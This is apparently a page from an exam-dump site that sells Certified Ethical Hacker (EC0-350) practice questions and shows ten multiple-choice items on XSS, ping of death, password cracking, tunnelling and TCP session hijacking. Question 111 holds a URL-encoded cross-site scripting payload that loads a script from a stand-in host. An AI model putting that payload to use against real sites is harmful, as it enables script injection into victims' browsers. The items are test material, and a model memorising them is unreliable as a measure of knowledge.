Pre-Summer Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65pass65

EC0-350 Ethical Hacking and Countermeasures V8 is now Stable and With Pass Result | Test Your Knowledge for Free

Exams4sure Dumps

EC0-350 Practice Questions

Ethical Hacking and Countermeasures V8

Last Update 3 days ago
Total Questions : 878

Dive into our fully updated and stable EC0-350 practice test platform, featuring all the latest Certified Ethical Hacker exam questions added this week. Our preparation tool is more than just a ECCouncil study aid; it's a strategic advantage.

Our free Certified Ethical Hacker practice questions crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key concepts about EC0-350. Use this test to pinpoint which areas you need to focus your study on.

EC0-350 PDF

EC0-350 PDF (Printable)
$43.75
$124.99

EC0-350 Testing Engine

EC0-350 PDF (Printable)
$50.75
$144.99

EC0-350 PDF + Testing Engine

EC0-350 PDF (Printable)
$63.7
$181.99
Question # 111

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E ">See foobar

What is this attack?

Options:

A.  

Cross-site-scripting attack

B.  

SQL Injection

C.  

URL Traversal attack

D.  

Buffer Overflow attack

Discussion 0
Question # 112

Lee is using Wireshark to log traffic on his network. He notices a number of packets being directed to an internal IP from an outside IP where the packets are ICMP and their size is around 65, 536 bytes. What is Lee seeing here?

Options:

A.  

Lee is seeing activity indicative of a Smurf attack.

B.  

Most likely, the ICMP packets are being sent in this manner to attempt IP spoofing.

C.  

Lee is seeing a Ping of death attack.

D.  

This is not unusual traffic, ICMP packets can be of any size.

Discussion 0
Question # 113

File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers?

Options:

A.  

Use disable-eXchange

B.  

Use mod_negotiation

C.  

Use Stop_Files

D.  

Use Lib_exchanges

Discussion 0
Question # 114

Which definition below best describes a covert channel?

Options:

A.  

A server program using a port that is not well known

B.  

Making use of a protocol in a way it was not intended to be used

C.  

It is the multiplexing taking place on a communication link

D.  

It is one of the weak channels used by WEP that makes it insecure

Discussion 0
Question # 115

What type of encryption does WPA2 use?

Options:

A.  

DES 64 bit

B.  

AES-CCMP 128 bit

C.  

MD5 48 bit

D.  

SHA 160 bit

Discussion 0
Question # 116

Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time?

Options:

A.  

Brute force attack

B.  

Birthday attack

C.  

Dictionary attack

D.  

Brute service attack

Discussion 0
Question # 117

Your company has blocked all the ports via external firewall and only allows port 80/443 to connect to the Internet. You want to use FTP to connect to some remote server on the Internet. How would you accomplish this?

Options:

A.  

Use HTTP Tunneling

B.  

Use Proxy Chaining

C.  

Use TOR Network

D.  

Use Reverse Chaining

Discussion 0
Question # 118

How do you defend against MAC attacks on a switch?

Question # 118

Options:

A.  

Disable SPAN port on the switch

B.  

Enable SNMP Trap on the switch

C.  

Configure IP security on the switch

D.  

Enable Port Security on the switch

Discussion 0
Question # 119

An Attacker creates a zuckerjournals.com website by copying and mirroring HACKERJOURNALS.COM site to spread the news that Hollywood actor Jason Jenkins died in a car accident. The attacker then submits his fake site for indexing in major search engines. When users search for "Jason Jenkins", attacker's fake site shows up and dupes victims by the fake news.

Question # 119

This is another great example that some people do not know what URL's are. Real website:

Fake website: http://www.zuckerjournals.com

Question # 119

The website is clearly not WWW.HACKERJOURNALS.COM. It is obvious for many, but unfortunately some people still do not know what an URL is. It's the address that you enter into the address bar at the top your browser and this is clearly not legit site, its www.zuckerjournals.com

How would you verify if a website is authentic or not?

Options:

A.  

Visit the site using secure HTTPS protocol and check the SSL certificate for authenticity

B.  

Navigate to the site by visiting various blogs and forums for authentic links

C.  

Enable Cache on your browser and lookout for error message warning on the screen

D.  

Visit the site by clicking on a link from Google search engine

Discussion 0
Question # 120

You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250.

Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server?

Options:

A.  

200-250

B.  

121-371

C.  

120-321

D.  

121-231

E.  

120-370

Discussion 0
Get EC0-350 dumps and pass your exam in 24 hours!

Free Exams Sample Questions